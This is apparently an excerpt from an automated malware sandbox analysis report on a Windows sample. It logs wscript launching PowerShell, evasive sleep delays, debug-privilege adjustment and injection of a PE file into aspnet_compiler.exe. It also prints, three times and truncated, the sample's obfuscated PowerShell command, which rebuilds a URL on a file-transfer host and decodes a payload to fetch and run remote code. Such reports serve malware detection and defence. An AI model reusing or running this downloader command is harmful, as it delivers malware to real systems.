Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6724	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6764	Thread sleep time: -10145709240540247s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3824	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5356	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 7405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 2003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: foregroundWindowGot 588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: foregroundWindowGot 638

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477

Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 420000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 422000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: D27008	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yxvc69/edrftgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yxvc69/edrftgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yxvc69/edrftgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a